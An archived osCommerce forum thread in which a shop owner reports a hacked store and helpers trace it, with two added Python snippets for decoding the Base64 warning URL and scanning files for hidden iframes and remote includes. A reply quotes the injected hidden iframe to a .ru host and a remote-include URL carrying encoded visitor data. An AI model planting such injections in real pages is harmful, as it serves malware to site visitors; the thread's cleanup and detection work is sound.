My website was hacked ... please help


takemexico

Hi guys,

 

Thanks for taking the time to help me. It is terrible and sad that someone would do this right before the Christmas season, but what can we do; some people are just evil.

 

My website Take Mexico was hacked about a week ago. I tried changing the files that are said to be affected, but in a matter of a few hours the hack comes back again. I was wondering if someone could help me out. What do you guys suggest?

 

Also how much would it cost to buy a new template and have all my products and descriptions re-uploaded? I know which template I want it's just the actual work of transferring all the files and descriptions. If anyone is interested in taking up this project and making some money you can contact me at [email protected].

 

Thanks for your help,

Take Mexico

Francisco Diaz :D

Link to comment
Share on other sites

It looks like it's gone.... happened first time with an error... the popup window came up with page not found...

 

Reloaded page and could not duplicate...

 

Dumped Cache.... tried link again no popup with porn site

Read, read, read, test, read, read, test, read, implement.

Always back up your site and database before changes.

Always back up on a regular basis.

Link to comment
Share on other sites

I checked out the site, popup opened, but address could not be found. At least you have that going for you. The first time I opened the site this error message was at the top.

Warning: Cannot modify header information - headers already sent by (output started at http://user7.phpinclude.ru/?d3d3LnRha2VtZXhpY28uY29t.d3d3LnRha2VtZXhpY28uY29t.Lw==.TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS43LjEyKSBHZWNrby8yMDA1MDkxNSBGaXJlZm94LzEuMC43.NjUuMjYuMTg1Ljg3:1) in /home/takemexi/public_html/store/includes/functions/general.php on line 1188

 

I don't know if the two are related (.ru - makes me think it is) but it is worth taking a look.

Link to comment
Share on other sites
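
Added example, not part of any post in this thread: in a "headers already sent" warning PHP names the file where output began, and here that file is a remote URL whose query string is dot-separated Base64 (the first field, d3d3LnRha2VtZXhpY28uY29t, decodes to www.takemexico.com). The sketch below pulls that URL out of a warning line and decodes the fields; the sample warning, its host names and the 192.0.2.10 address are constructed, and what each field position means is an inference from decoding, not something the thread documents.

```python
import base64
import binascii
import re

# PHP reports "output started at <file>:<line>"; a scheme:// origin means remote code ran.
STARTED_AT = re.compile(r"output started at (\w+://[^\s?]+)\?(\S+?):(\d+)\)")

def decode_fields(query):
    """Split a dot-separated query and Base64-decode every field that decodes cleanly."""
    out = []
    for field in query.split("."):
        try:
            out.append(base64.b64decode(field, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            out.append(None)  # not Base64 text: keep the position, drop the value
    return out

def analyse_warning(line):
    """Return (remote URL, decoded fields, line number), or None for a local origin."""
    m = STARTED_AT.search(line)
    if not m:
        return None
    return m.group(1), decode_fields(m.group(2)), int(m.group(3))

def b64(text):
    return base64.b64encode(text.encode()).decode()

# Constructed sample in the same layout as the warning quoted in the thread.
SAMPLE_VALUES = ["shop.example.com", "shop.example.com", "/",
                 "ExampleBrowser/1.0", "192.0.2.10"]
SAMPLE = ("Warning: Cannot modify header information - headers already sent by "
          "(output started at http://inc.example.net/?"
          + ".".join(b64(v) for v in SAMPLE_VALUES)
          + ":1) in /home/shop/public_html/includes/functions/general.php on line 1188")

if __name__ == "__main__":
    url, fields, lineno = analyse_warning(SAMPLE)
    print("remote origin:", url, "line", lineno)
    for i, value in enumerate(fields):
        print(f"  field {i}: {value!r}")
```
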


I saw the same thing. That definitely does not belong in there.

 

You'll need to figure out how they're getting write access to the includes directory and check through that general.php file.

 

Is the standard .htaccess file in the includes directory? Some people take that out because of image problems.

 

Is admin protected? Rename and move that folder.

Local: Mac OS X 10.5.8 - Apache 2.2/php 5.3.0/MySQL 5.4.10 • Web Servers: Linux

Tools: BBEdit, Coda, Versions (Subversion), Sequel Pro (db management)

Link to comment
Share on other sites

It worked for me, but the popup porn site made me think that was YOUR site.. definitely not a good thing for potential customers to see.

 

It only loaded once; once I clicked around a bit and went back to the main page, the header warning and the pop-up did not occur. You should do a search in all of your .php files for ".ru".

 

The error was calling a peculiar URL that happened to be a .ru domain.

If you find that, you may be able to find out which files they edited.

 

Just download every .php file from your website and run the Windows search feature on only the folder that holds the PHP files; that way it should only take a minute or so for the results (it won't search your entire C: drive).

Link to comment
Share on other sites

You need to look in includes/header.php for this code injection:

 

<iframe src="http://user25.iframe.ru/" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe><br />

 

That link is injecting this:

headers already sent by (output started at http://user7.phpinclude.ru/?d3d3LnRha2VtZXhpY28uY29t.d3d3LnRha2VtZXhpY28uY29t.Lw==.TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMTsgU1YxKQ==.MTk1LjEzNy40LjE2Mg==:1) in <b>/home/takemexi/public_html/store/includes/functions/general.php</b> on line <b>1188</b><br />

 

The good news is that your database is probably okay, but I'd dump the files and start with a new (updated and patched) osCommerce MS2 - the link to which is under the "Latest News" link on this forum's homepage. It looks as though your site has run foul of the HTTP Header Injection exploit.

 

There is something else going on with this site - causing a FrontPage pop-up to try to start installing FrontPage modules. I'd advise others against going to the site until the hack is cleared out.

 

Vger

Link to comment
Share on other sites
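
Added example, not part of any post in this thread: the two search suggestions above (look for ".ru" in every .php file, and look for the 1x1 iframe in includes/header.php) written as one scan over a downloaded copy of the site. It generalises the ".ru" search to any host that is not on an allow-list you supply; the host names and file contents in `demo()` are constructed, and the patterns are heuristics that will also flag legitimate off-site links.

```python
import re
import tempfile
from pathlib import Path

IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
# width/height of 0 or 1 (not 10, 100 or 100%) marks a frame meant to be invisible
TINY = re.compile(r"\b(?:width|height)\s*=\s*[\"']?[01](?![\d%])", re.I)
# include/require statement whose argument holds a literal remote URL
REMOTE_INC = re.compile(r"\b(?:include|require)(?:_once)?\b[^;]*?(?:https?|ftp)://", re.I)
URL_HOST = re.compile(r"(?:https?|ftp)://([a-z0-9.-]+)", re.I)
EXTS = {".php", ".inc", ".html", ".htm", ".js"}

def scan_tree(root, allowed_hosts=()):
    """Return (relative path, line number, reason) for each suspicious line."""
    root = Path(root)
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    files = sorted(p for p in root.rglob("*") if p.is_file() and p.suffix.lower() in EXTS)
    for path in files:
        rel = path.relative_to(root).as_posix()
        text = path.read_text(encoding="utf-8", errors="replace")
        for n, line in enumerate(text.splitlines(), 1):
            if any(TINY.search(tag) for tag in IFRAME.findall(line)):
                findings.append((rel, n, "hidden iframe"))
            if REMOTE_INC.search(line):
                findings.append((rel, n, "remote include"))
            for host in sorted({h.lower() for h in URL_HOST.findall(line)} - allowed):
                findings.append((rel, n, "off-site host " + host))
    return findings

def demo():
    """Scan a constructed two-file tree (sample data, not the site's real files)."""
    with tempfile.TemporaryDirectory() as d:
        inc = Path(d, "includes")
        (inc / "functions").mkdir(parents=True)
        (inc / "header.php").write_text(
            '<?php echo "header"; ?>\n'
            '<iframe src="http://frames.example.net/" width=1 height=1></iframe>\n'
            '<a href="http://shop.example.com/index.php">Home</a>\n')
        (inc / "functions" / "general.php").write_text(
            '<?php\n// constructed sample\ninclude("http://inc.example.net/x.txt");\n')
        return scan_tree(d, allowed_hosts=["shop.example.com"])

if __name__ == "__main__":
    for finding in demo():
        print(*finding)
```

Run `scan_tree()` on the downloaded copy with the shop's own host names in `allowed_hosts`, and compare anything it flags against a clean osCommerce copy of the same file.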

Archived

This topic is now archived and is closed to further replies.
